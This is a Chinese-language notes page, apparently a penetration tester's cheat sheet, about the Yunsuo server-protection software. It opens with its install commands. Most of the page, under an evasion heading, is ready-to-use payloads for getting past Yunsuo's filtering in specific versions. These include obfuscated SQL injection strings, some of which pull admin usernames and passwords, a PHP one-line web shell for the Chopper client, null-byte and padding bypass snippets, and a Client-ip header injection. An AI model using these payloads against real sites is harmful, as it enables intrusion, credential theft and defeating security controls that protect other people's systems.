安装
安装 - Linux
前提:
检查selinux状态 - 关闭selinux getenforce #显示为disabled则为关闭 1.下载 x86:wget http://download.yunsuo.com.cn/v3/yunsuo_agent_32bit.tar.gz && tar xvzf yunsuo_agent_32bit.tar.gz && chmod +x yunsuo_install/install && yunsuo_install/install x64:wget http://download.yunsuo.com.cn/v3/yunsuo_agent_64bit.tar.gz && tar xvzf yunsuo_agent_64bit.tar.gz && chmod +x yunsuo_install/install && 2.解压 chmod +x yunsuo_install/install 3.在当前路径下执行安装 yunsuo_install/install 4.添加服务器到云中心。 /usr/local/yunsuo_agent/yunsuo_smart_tool.sh -u cloud_name -p cloud_passwd 注:cloud_name:云中心账户名;cloud_passwd:云中心登录密码 5.查看状态 ps -ef | grep yunsuo_agent 相关命令 云锁启动/停止/重启/运行状态 service yunsuo start/stop/restart/status /etc/init.d/yunsuo start/stop/restart/status 卸载 /usr/local/yunsuo_agent/uninstall
安装 - Windos
下载
http://download.yunsuo.com.cn/v3/%E4%BA%91%E9%94%81%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%AB%AF(%E5%AE%89%E8%A3%85%E5%9C%A8%E6%9C%8D%E5%8A%A1%E5%99%A8%E4%B8%8A).exe
免杀
GET POST转换 + 空格替换
针对过滤不完全情况
搜索框 + SQL注入 + 字符型
?type=2%0A%09%0B%0C%0D/**//**//**//**//**//**//**/and%0A%09%0B%0C%0D/**//**//**//**//**//**//**/(select%0A%09%0B%0C%0D/**//**//**//**//**//**//**/1%0A%09%0B%0C%0D/**//**//**//**//**//**//**/from(select%0A%09%0B%0C%0D/**//**//**//**//**//**//**/count(*),concat(user(),floor(rand(0)*2))x%0A%09%0B%0C%0D/**//**//**//**//**//**//**/from%0A%09%0B%0C%0D/**//**//**//**//**//**//**/information_schema.tables%0A%09%0B%0C%0D/**//**//**//**//**//**//**/group%0A%09%0B%0C%0D/**//**//**//**//**//**//**/by%0A%09%0B%0C%0D/**//**//**//**//**//**//**/x)y)%23
?type=2%0A%09%0B%0C%0D/**//**//**//**//**//**//**/and%0A%09%0B%0C%0D/**//**//**//**//**//**//**/(select%0A%09%0B%0C%0D/**//**//**//**//**//**//**/1%0A%09%0B%0C%0D/**//**//**//**//**//**//**/from(select%0A%09%0B%0C%0D/**//**//**//**//**//**//**/count(*),concat(user(),floor(rand(0)*2))x%0A%09%0B%0C%0D/**//**//**//**//**//**//**/from%0A%09%0B%0C%0D/**//**//**//**//**//**//**/information_schema.tables%0A%09%0B%0C%0D/**//**//**//**//**//**//**/group%0A%09%0B%0C%0D/**//**//**//**//**//**//**/by%0A%09%0B%0C%0D/**//**//**//**//**//**//**/x)y)%23
union select + ()绕过
?id=-1union(select 1,2,3,@@datadir,5,6,7,8,9,10,11,12,13,14,15,16,17)
union select + '' + /**/ + ) + # 绕过
?id='/*')union select user,database() from users%23*/&submit=Submit#
IIS + 字符编码绕过 - unicode
asp?t=112 %u00aand(s%u00f0lect top 1 eventname_en from eventshelp) > 0
WideChar和MultiByte字符转换问题 - 2002年
一句话 + 菜刀 绕过
<?php<br> $_REQUEST['a']($_REQUEST['b']);<br> ?>
1.3.145版本 - 包冗余绕过
超过7250byte的部分不被检测
1.3.145版本 - x00 绕过
GET型 def getdata(n): data = 'name=x00test' data += '&id=select 1 from table' return data POST型 def postdata(n) data = '------WebKitFormBoundarycMYRelX1B2H69xy9 ' data += '------'WebKitFormBoundarycMYRelX1B2H69xy9 ' data += '%27abcd ' data += '------WebKitFormBoundarycMYRelX1B2H69xy9 ' data += 'Content-Disposition: form-data; name="submit" ' data += 'select 1 from table ' data += '------WebKitFormBoundarycMYRelX1B2H69xy9 ' return data COOKIE型 header = { 'User-Agent' : 'letmetest', 'Content-Type' : 'multipart/form-data: boundary=----WebKitFormBoundarycMYRelX1B2H69xy9' 'X-forwarded-For' : 'select 1 from table' }
1.3.145版本 - E0绕过
?id=8E0union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43# ?id=8E0union%20select%201,2,3,admin_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43%20from%20qs_admin#
1.3.191版本 - E0 + /**/ + current_user 绕过
?id=8E0union/*123*/select/*123*/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43# ?id=8E0union/*123*/select/*123*/1,2,3,current_user,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43#
1.4.121版本 - 默认对post、cookie不检测,对header字段未做防护
Header头 - Client-ip注入 Client-ip: 1.2.3.4 'or @ `'` AND (SELECT 1 FROM (SELECT count(1),concat(round(rand(0)), (SELECT concat(username,0x23,password) FROM pm_admin LIMIT 0,1)) a FROM information_schema.tables GROUP by a)b) or @ `'` and ''='